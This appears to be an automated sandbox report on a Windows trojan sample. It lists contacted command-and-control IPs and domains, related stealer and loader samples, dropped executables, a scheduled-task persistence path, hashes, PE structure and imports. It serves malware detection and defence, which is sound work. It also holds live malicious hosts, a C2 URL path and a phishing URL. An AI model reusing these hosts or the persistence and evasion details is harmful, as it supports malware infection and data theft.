              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              91.202.233.158
              unknownRussian Federation
              9009M247GBtrue
              191.96.144.157
              free.cdn.hstgr.netChile
              138968RAINBOWIDC-AS-APrainbownetworklimitedJPtrue
              102.189.104.201
              epohe.ruEgypt
              24835RAYA-ASEGtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1502849
              Start date and time:2024-09-02 11:41:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 26s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:e0OOofAl0S.exe
              renamed because original name is a hash value
              Original Sample Name:bdaeb131caed57083370b0c24ed030eb.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/4@9/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 46
              • Number of non-executed functions: 12
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              05:42:23API Interceptor470482x Sleep call for process: explorer.exe modified
              10:42:24Task SchedulerRun new task: Firefox Default Browser Agent 894AECB0EB4ADF69 path: C:\Users\user\AppData\Roaming\busaafd
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              91.202.233.158oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
              • 91.202.233.158/e96ea2db21fa9a1b.php
              mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
              • 91.202.233.158/e96ea2db21fa9a1b.php
              V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
              • 91.202.233.158/e96ea2db21fa9a1b.php
              h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
              • 91.202.233.158/e96ea2db21fa9a1b.php
              h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
              • 91.202.233.158/e96ea2db21fa9a1b.php
              191.96.144.157npp.8.5.6.Installer.x64.exeGet hashmaliciousMars Stealer, VidarBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                epohe.ruoZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 2.185.214.11
                mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 175.119.10.231
                V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 211.181.24.132
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 105.155.13.153
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 185.12.79.25
                free.cdn.hstgr.netoZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 84.32.84.152
                mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 185.77.97.68
                V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 84.32.84.249
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 84.32.84.88
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 84.32.84.144
                https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                • 154.62.105.236
                https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0Get hashmaliciousUnknownBrowse
                • 84.32.84.212
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                M247GBoZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 91.202.233.158
                mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 91.202.233.158
                V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 91.202.233.158
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 91.202.233.158
                h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                • 91.202.233.158
                firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                • 172.111.253.69
                sora.m68k.elfGet hashmaliciousMiraiBrowse
                • 158.46.140.117
                OFFER-INQUIRY.jarGet hashmaliciousSTRRATBrowse
                • 37.120.199.54
                http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                • 38.132.109.126
                1724161253.9014926.dllGet hashmaliciousUnknownBrowse
                • 172.86.67.94
                RAYA-ASEGsora.ppc.elfGet hashmaliciousUnknownBrowse
                • 41.69.118.216
                firmware.i686.elfGet hashmaliciousUnknownBrowse
                • 41.69.184.192
                firmware.sh4.elfGet hashmaliciousUnknownBrowse
                • 197.133.173.134
                jew.arm7.elfGet hashmaliciousMiraiBrowse
                • 41.70.6.198
                YK85paB4RW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                • 102.189.60.56
                82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                • 102.189.60.56
                Ltoj8zXMGf.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                • 102.189.60.56
                nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                • 41.69.166.147
                nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                • 41.68.96.159
                b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                • 102.189.120.25
                RAINBOWIDC-AS-APrainbownetworklimitedJP17217823862eb632fc7d34e74738954b9759cb00e549b63a7beb37128ab350b4d321af771d904.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                • 191.96.79.79
                Comprovante-Pagamento_66a04578f18a3.jsGet hashmaliciousClipboard Hijacker, QuasarBrowse
                • 191.96.79.79
                SecuriteInfo.com.Win32.MalwareX-gen.20138.12701.exeGet hashmaliciousUnknownBrowse
                • 191.96.92.46
                SecuriteInfo.com.Win32.MalwareX-gen.20138.12701.exeGet hashmaliciousUnknownBrowse
                • 191.96.92.46
                xS8bwPQjO2.elfGet hashmaliciousMiraiBrowse
                • 181.214.84.236
                jql.jarGet hashmaliciousUnknownBrowse
                • 191.96.144.23
                https://royal-visit.com/Get hashmaliciousUnknownBrowse
                • 191.96.144.88
                file.exeGet hashmaliciousFormBookBrowse
                • 191.96.144.210
                file.exeGet hashmaliciousFormBookBrowse
                • 191.96.144.172
                http://shortens.meGet hashmaliciousUnknownBrowse
                • 191.96.144.79
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1http://10eurodisconto.com?rid=iVbb6XlGet hashmaliciousUnknownBrowse
                • 191.96.144.157
                EiTkH53St5.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 191.96.144.157
                oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 191.96.144.157
                NeJp3E5Y5s.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 191.96.144.157
                5QfB8N2Jte.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 191.96.144.157
                x6N3TgPQvm.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 191.96.144.157
                mth9UWp36C.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 191.96.144.157
                mLisubeK3B.exeGet hashmaliciousLummaCBrowse
                • 191.96.144.157
                4BPdl1loHY.exeGet hashmaliciousLummaCBrowse
                • 191.96.144.157
                7IMcMa3pcr.exeGet hashmaliciousLummaCBrowse
                • 191.96.144.157
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\svchost015.exeoZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                  mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                    V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                        h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                          ACGPhnMVxb.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                            2eqt27LXwV.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                              uxx8jvvSHl.exeGet hashmaliciousLummaC, CryptOneBrowse
                                1wM0OWBdv5.exeGet hashmaliciousLummaC, CryptOneBrowse
                                  1wM0OWBdv5.exeGet hashmaliciousLummaC, CryptOneBrowse
                                    C:\Users\user\AppData\Local\Temp\D931.exeoZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                      mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                        V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                          h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                            h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):3639176
                                              Entropy (8bit):7.398157669285365
                                              Encrypted:false
                                              SSDEEP:98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
                                              MD5:17D51083CCB2B20074B1DC2CAC5BEA36
                                              SHA1:0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
                                              SHA-256:681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
                                              SHA-512:7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 38%
                                              Joe Sandbox View:
                                              • Filename: oZB7n3wuNk.exe, Detection: malicious, Browse
                                              • Filename: mLn7GEEpuS.exe, Detection: malicious, Browse
                                              • Filename: V6n3oygctH.exe, Detection: malicious, Browse
                                              • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                              • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\D931.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):2990472
                                              Entropy (8bit):6.459856200541649
                                              Encrypted:false
                                              SSDEEP:49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
                                              MD5:B826DD92D78EA2526E465A34324EBEEA
                                              SHA1:BF8A0093ACFD2EB93C102E1A5745FB080575372E
                                              SHA-256:7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
                                              SHA-512:1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 4%
                                              Joe Sandbox View:
                                              • Filename: oZB7n3wuNk.exe, Detection: malicious, Browse
                                              • Filename: mLn7GEEpuS.exe, Detection: malicious, Browse
                                              • Filename: V6n3oygctH.exe, Detection: malicious, Browse
                                              • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                              • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                              • Filename: ACGPhnMVxb.exe, Detection: malicious, Browse
                                              • Filename: 2eqt27LXwV.exe, Detection: malicious, Browse
                                              • Filename: uxx8jvvSHl.exe, Detection: malicious, Browse
                                              • Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse
                                              • Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):221696
                                              Entropy (8bit):6.520221953543134
                                              Encrypted:false
                                              SSDEEP:3072:+t7l9Bx/d/vBKjcwALZSpjMiWShrJYhdd/iPga9//qZXXxPrd:ABx/d/vBKjcw0IllYhDVgqZX
                                              MD5:BDAEB131CAED57083370B0C24ED030EB
                                              SHA1:C4A00FC122D2015D41C0CF38E00A4711AE05D66D
                                              SHA-256:0923186058B76B52069AF9FD282AF6C98766179CBDD524E4D941E0BF44802781
                                              SHA-512:F1B68CB0A01A3771D46D3C9A66823F2E0E93461ED8ECAB18F807654FC108B14137980DDC637DB1F5B66F74BBA86D9929692093CCBAB9E6A2072FAB9AAE904501
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qX.n59.=59.=59.=ZOl=/9.=ZOY='9.=ZOm=P9.=<AT=69.=59.=\9.=ZOh=49.=ZO]=49.=ZOZ=49.=Rich59.=........................PE..L...p.4d..........................................@.................................9k..........................................(....P..xy..............................................................................t............................text...O........................... ..`.rdata..D&.......(..................@..@.data...`a....... ..................@....rsrc...xy...P...z..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.520221953543134
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:e0OOofAl0S.exe
                                              File size:221'696 bytes
                                              MD5:bdaeb131caed57083370b0c24ed030eb
                                              SHA1:c4a00fc122d2015d41c0cf38e00a4711ae05d66d
                                              SHA256:0923186058b76b52069af9fd282af6c98766179cbdd524e4d941e0bf44802781
                                              SHA512:f1b68cb0a01a3771d46d3c9a66823f2e0e93461ed8ecab18f807654fc108b14137980ddc637db1f5b66f74bba86d9929692093ccbab9e6a2072fab9aae904501
                                              SSDEEP:3072:+t7l9Bx/d/vBKjcwALZSpjMiWShrJYhdd/iPga9//qZXXxPrd:ABx/d/vBKjcw0IllYhDVgqZX
                                              TLSH:B1246C10F1E39026EDA647755930CAA11D3ABCF2EE7D819F7254FA2F19B32D0CA15722
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qX.n59.=59.=59.=ZOl=/9.=ZOY='9.=ZOm=P9.=<AT=69.=59.=\9.=ZOh=49.=ZO]=49.=ZOZ=49.=Rich59.=........................PE..L...p.4d...
                                              Icon Hash:351a111212931009
                                              Entrypoint:0x401abc
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6434ED70 [Tue Apr 11 05:17:36 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:371f652fdd8e6836c241a37f6252659c
                                              Instruction
                                              call 00007F5A50BD93A6h
                                              jmp 00007F5A50BD4E7Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [0041FB10h], eax
                                              mov dword ptr [0041FB0Ch], ecx
                                              mov dword ptr [0041FB08h], edx
                                              mov dword ptr [0041FB04h], ebx
                                              mov dword ptr [0041FB00h], esi
                                              mov dword ptr [0041FAFCh], edi
                                              mov word ptr [0041FB28h], ss
                                              mov word ptr [0041FB1Ch], cs
                                              mov word ptr [0041FAF8h], ds
                                              mov word ptr [0041FAF4h], es
                                              mov word ptr [0041FAF0h], fs
                                              mov word ptr [0041FAECh], gs
                                              pushfd
                                              pop dword ptr [0041FB20h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [0041FB14h], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [0041FB18h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [0041FB24h], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [0041FA60h], 00010001h
                                              mov eax, dword ptr [0041FB18h]
                                              mov dword ptr [0041FA14h], eax
                                              mov dword ptr [0041FA08h], C0000409h
                                              mov dword ptr [0041FA0Ch], 00000001h
                                              mov eax, dword ptr [0041E004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [0041E008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [000000C8h]
                                              Programming Language:
                                              • [C++] VS2010 build 30319
                                              • [ASM] VS2010 build 30319
                                              • [ C ] VS2010 build 30319
                                              • [IMP] VS2008 SP1 build 30729
                                              • [RES] VS2010 build 30319
                                              • [LNK] VS2010 build 30319
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1cdc40x28.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x17978.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x174.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x19b4f0x19c00ca09759a56bfbeed524b101fec93f40aFalse0.777002427184466data7.427181340563761IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x1b0000x26440x2800e35c410e07d8187edf13152e46df7878False0.3318359375data4.811674457698979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1e0000x61600x2000a04e3c2ccee016c3e8d8ac9b6c0bee16False0.1854248046875data2.133984081459015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x250000x179780x17a0070baa7c6651aef1480c69aff56bdb477False0.4749503968253968data5.388679410390647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              AFX_DIALOG_LAYOUT0x37ca00x2data5.0
                                              BIKIGOTECOSOCIWOZ0x36c800xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.5994123408423114
                                              CELOCIBUMOFON0x378780x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6335952848722987
                                              RT_CURSOR0x37ca80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                              RT_CURSOR0x37dd80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                              RT_ICON0x259900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5882196162046909
                                              RT_ICON0x268380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6683212996389891
                                              RT_ICON0x270e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7217741935483871
                                              RT_ICON0x277a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7615606936416185
                                              RT_ICON0x27d100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5464730290456431
                                              RT_ICON0x2a2b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6651031894934334
                                              RT_ICON0x2b3600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6819672131147541
                                              RT_ICON0x2bce80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8093971631205674
                                              RT_ICON0x2c1c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.4059168443496802
                                              RT_ICON0x2d0700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5676895306859205
                                              RT_ICON0x2d9180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6278801843317973
                                              RT_ICON0x2dfe00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6358381502890174
                                              RT_ICON0x2e5480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4674015009380863
                                              RT_ICON0x2f5f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4487704918032787
                                              RT_ICON0x2ff780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.49822695035460995
                                              RT_ICON0x304480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3419509594882729
                                              RT_ICON0x312f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.463898916967509
                                              RT_ICON0x31b980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.49942396313364057
                                              RT_ICON0x322600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5260115606936416
                                              RT_ICON0x327c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42697095435684645
                                              RT_ICON0x34d700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4343339587242026
                                              RT_ICON0x35e180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43483606557377047
                                              RT_ICON0x367a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.449468085106383
                                              RT_DIALOG0x3a5500x84data0.7651515151515151
                                              RT_STRING0x3a5d80x2b4data0.4956647398843931
                                              RT_STRING0x3a8900x47edata0.46608695652173915
                                              RT_STRING0x3ad100x182data0.49222797927461137
                                              RT_STRING0x3ae980x782data0.41883454734651404
                                              RT_STRING0x3b6200x6c2data0.4300578034682081
                                              RT_STRING0x3bce80x61edata0.43614303959131545
                                              RT_STRING0x3c3080x5dedata0.43275632490013316
                                              RT_STRING0x3c8e80x90data0.5833333333333334
                                              RT_ACCELERATOR0x37c780x28data1.025
                                              RT_GROUP_CURSOR0x3a3800x22data1.088235294117647
                                              RT_GROUP_ICON0x36c080x76dataTurkishTurkey0.6694915254237288
                                              RT_GROUP_ICON0x2c1500x76dataTurkishTurkey0.6610169491525424
                                              RT_GROUP_ICON0x303e00x68dataTurkishTurkey0.7115384615384616
                                              RT_VERSION0x3a3a80x1a8data0.5919811320754716
                                              DLLImport
                                              KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, SearchPathW, DebugActiveProcessStop, GetDefaultCommConfigW, CallNamedPipeA, WriteConsoleOutputW, HeapAlloc, InterlockedDecrement, GlobalSize, GetEnvironmentStringsW, CreateDirectoryW, GetComputerNameW, GetModuleHandleW, GetConsoleAliasesLengthA, GetUserDefaultLangID, GetCommandLineA, GetSystemTimes, GlobalAlloc, LoadLibraryW, GetConsoleAliasExesLengthW, LeaveCriticalSection, SetConsoleMode, SetConsoleTitleA, InterlockedExchange, GetStartupInfoA, GetLastError, GetProcAddress, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, WritePrivateProfileStringA, QueryDosDeviceW, FindNextChangeNotification, FoldStringW, GetModuleFileNameA, FreeEnvironmentStringsW, VirtualProtect, FindAtomW, CopyFileExA, MultiByteToWideChar, EncodePointer, DecodePointer, ExitProcess, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, EnterCriticalSection, Sleep, HeapSize, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeW, HeapFree, RtlUnwind, HeapReAlloc, IsProcessorFeaturePresent, GetConsoleCP, GetConsoleMode, FlushFileBuffers, ReadFile, CloseHandle, WriteConsoleW, SetFilePointer, CreateFileW
                                              Language of compilation systemCountry where language is spokenMap
                                              TurkishTurkey
